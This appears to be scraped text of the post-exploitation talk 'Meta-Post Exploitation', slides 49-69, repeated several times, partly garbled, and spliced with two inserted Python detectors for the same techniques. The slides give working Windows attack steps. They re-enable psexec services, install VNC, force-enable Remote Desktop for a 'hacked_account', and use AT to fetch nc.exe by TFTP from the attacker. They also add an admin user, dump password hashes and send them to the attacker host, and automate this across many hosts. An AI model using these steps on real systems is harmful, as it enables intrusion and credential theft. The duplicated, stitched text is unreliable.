bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: a system controlling access to security doors
– No command line way of modifying the system, need a GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
– This file will fix policy settings in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
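A defender-side counterpart to slides 49 through 54, added here as an example and not part of the talk or its tools: every change those slides make leaves a footprint in exactly the two file formats the slides show, a registry export and a secedit INF export. The Python below parses both formats and flags the indicators the slides rely on (ClipBook/NetDDE/Terminal Services switched to automatic start, fDenyTSConnections cleared, interactive or remote logon rights granted to an account outside an allow-list, and the deny-logon rights emptied). The sample exports, the watched-service set and the allow-list of accounts are constructed for the example and are assumptions, not values from the talk; a real audit would feed it `reg export` and `secedit /export` output from the host.

```python
"""Audit Windows registry and secedit exports for the feature re-enabling
indicators described on slides 49-54: ClipBook/NetDDE services switched to
automatic start, Terminal Server connections re-enabled, and logon rights
handed to an unexpected account. Added example, not the talk's own code."""
import re

# Service Start values under HKLM\SYSTEM\CurrentControlSet\Services\<name>
AUTO_START = 2
# Services the talk re-enables to make psexec and Remote Desktop work (assumed set)
WATCHED_SERVICES = {"clipsrv", "netdde", "netddedsdm", "termservice"}
# Accounts expected to hold interactive/remote logon rights (assumed allow-list)
ALLOWED_LOGON_ACCOUNTS = {"administrators", "remote desktop users"}

TS_KEY = "hkey_local_machine\\system\\currentcontrolset\\control\\terminal server"
SERVICES_PREFIX = "hkey_local_machine\\system\\currentcontrolset\\services\\"

# Constructed sample .reg export (not taken from a real host)
SAMPLE_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetDDE]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]
"Start"=dword:00000002
"""

# Constructed sample secedit INF export in the slide-53 layout
SAMPLE_INF = """
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = Administrators,svc_unexpected
seinteractivelogonright = Administrators
sedenyremoteinteractivelogonright =
sedenynetworklogonright = Guest
"""


def parse_reg(text):
    """Parse a regedit export into {key (lowercased): {value name (lowercased): raw}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"?([^"=]+)"?=(.*)$', line)
        if m and current is not None:
            keys[current][m.group(1).lower()] = m.group(2)
    return keys


def dword(raw):
    """Convert 'dword:00000002' into the integer 2."""
    if not raw.lower().startswith("dword:"):
        raise ValueError("not a DWORD: %s" % raw)
    return int(raw.split(":", 1)[1], 16)


def audit_reg(text):
    """Return human-readable findings for the registry indicators."""
    findings = []
    reg = parse_reg(text)
    ts = reg.get(TS_KEY, {})
    if "fdenytsconnections" in ts and dword(ts["fdenytsconnections"]) == 0:
        findings.append("Terminal Server: fDenyTSConnections=0 (remote desktop enabled)")
    for key, values in reg.items():
        if key.startswith(SERVICES_PREFIX) and "start" in values:
            svc = key[len(SERVICES_PREFIX):]
            if svc in WATCHED_SERVICES and dword(values["start"]) == AUTO_START:
                findings.append("service %s: Start=2 (automatic)" % svc)
    return findings


def parse_inf_privileges(text):
    """Return {right (lowercased): [accounts]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if in_section and "=" in line:
            name, _, value = line.partition("=")
            rights[name.strip().lower()] = [a.strip() for a in value.split(",") if a.strip()]
    return rights


def audit_inf(text, allowed=ALLOWED_LOGON_ACCOUNTS):
    """Return findings for granted logon rights and cleared deny rights."""
    findings = []
    rights = parse_inf_privileges(text)
    for right in ("seremoteinteractivelogonright", "seinteractivelogonright"):
        for acct in rights.get(right, []):
            if acct.lower() not in allowed:
                findings.append("%s granted to unexpected account %s" % (right, acct))
    for right in ("sedenyinteractivelogonright",
                  "sedenyremoteinteractivelogonright",
                  "sedenynetworklogonright"):
        if right in rights and not rights[right]:
            findings.append("%s has been cleared" % right)
    return findings


if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG) + audit_inf(SAMPLE_INF):
        print("FINDING:", f)
```

The two parsers are deliberately lenient (quoted or unquoted value names, any case) because exports differ between Windows versions; the checks themselves are strict equality on the values the slides write, so a change of Start from 2 to 3 or of fDenyTSConnections back to 1 drops out of the findings.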
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable/start services
– Transfer files
– Add users
– Mess with the registry/policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time +1min) "tftp -i use GET e.bat"
– at \\target (net time +2min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP, back to attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use/re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish netbios session/credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
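Slides 58 through 61 describe a scheduler pattern with two stable properties a defender can key on: the job is created to fire within a minute or two of creation (the "net time +1min" idiom), and its command pulls a file over TFTP or adds a local administrator. Slide 65 adds a third, namely one source doing this against a range of hosts at once. The Python below, added here as an example and not part of the talk or of AtAbuse, implements all three checks over a constructed, already-normalised CSV of task-creation events (the column names `created`, `source`, `target`, `run_at`, `command`, the 5-minute "imminent" cut-off and the 3-hosts-in-10-minutes burst threshold are assumptions for the example, not values from the talk or from any Windows log format).

```python
"""Detection logic for the AT-scheduler pattern on slides 58-61 and the
mass-automation pattern on slide 65. Added example, not the talk's tooling:
it consumes a constructed, already-normalised CSV of task-creation events
(one row per job a collector saw created on a host)."""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command fragments the slides' batch file uses once the job runs: a TFTP
# pull, local account creation, and an admin-group membership change.
SUSPICIOUS_COMMAND = re.compile(
    r"\btftp\b.*\bget\b"
    r"|\bnet\s+user\b.*/add"
    r"|\bnet\s+localgroup\s+administrators\b.*/add",
    re.IGNORECASE,
)

# Constructed sample; column names are assumed for a normalised collector feed
SAMPLE_LOG = """\
created,source,target,run_at,command
2008-02-01T12:00:05,10.0.0.5,HOST-A,2008-02-01T12:01:00,tftp -i 10.0.0.5 GET e.bat
2008-02-01T12:00:07,10.0.0.5,HOST-B,2008-02-01T12:01:00,tftp -i 10.0.0.5 GET e.bat
2008-02-01T12:00:09,10.0.0.5,HOST-C,2008-02-01T12:01:00,tftp -i 10.0.0.5 GET e.bat
2008-02-01T12:02:00,10.0.0.5,HOST-A,2008-02-01T12:03:00,e.bat
2008-02-01T09:00:00,10.0.0.9,HOST-Z,2008-02-02T02:00:00,backup.cmd /full
"""


def parse_events(text):
    """Turn the CSV feed into dicts with parsed timestamps."""
    events = []
    for rec in csv.DictReader(io.StringIO(text)):
        events.append({
            "created": datetime.fromisoformat(rec["created"]),
            "source": rec["source"],
            "target": rec["target"],
            "run_at": datetime.fromisoformat(rec["run_at"]),
            "command": rec["command"],
        })
    return events


def classify(event, imminent=timedelta(minutes=5)):
    """Flags for one job: scheduled to fire almost immediately (the
    'net time +1min' idiom) and/or a command the slides' batch file uses."""
    flags = []
    delay = event["run_at"] - event["created"]
    if timedelta(0) <= delay <= imminent:
        flags.append("imminent")
    if SUSPICIOUS_COMMAND.search(event["command"]):
        flags.append("suspicious_command")
    return flags


def find_bursts(events, min_targets=3, window=timedelta(minutes=10)):
    """One source scheduling jobs on many distinct hosts inside a short
    window is the signature of slide-65 style mass tooling."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source"]].append(e)
    bursts = []
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["created"])
        for i, first in enumerate(evs):
            targets = {e["target"] for e in evs[i:]
                       if e["created"] - first["created"] <= window}
            if len(targets) >= min_targets:
                bursts.append((source, len(targets)))
                break
    return bursts


def analyze(text):
    """Return flagged jobs and burst sources for a CSV feed."""
    events = parse_events(text)
    flagged = []
    for e in events:
        flags = classify(e)
        if flags:
            flagged.append((e["target"], e["command"], flags))
    return {"flagged": flagged, "bursts": find_bursts(events)}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for target, command, flags in result["flagged"]:
        print("job on %s: %s -> %s" % (target, command, ", ".join(flags)))
    for source, count in result["bursts"]:
        print("burst: %s scheduled jobs on %d hosts" % (source, count))
```

The burst check is the part that scales with the talk's "1000's of hosts" framing: a single imminent job on one host is ambiguous, but the same source creating imminent jobs on three or more hosts within ten minutes is not something administrators do by hand, and the legitimate overnight backup job in the sample shows the per-event rules staying quiet when the schedule is hours away.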
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to:
• All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
• HD Moore especially, for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
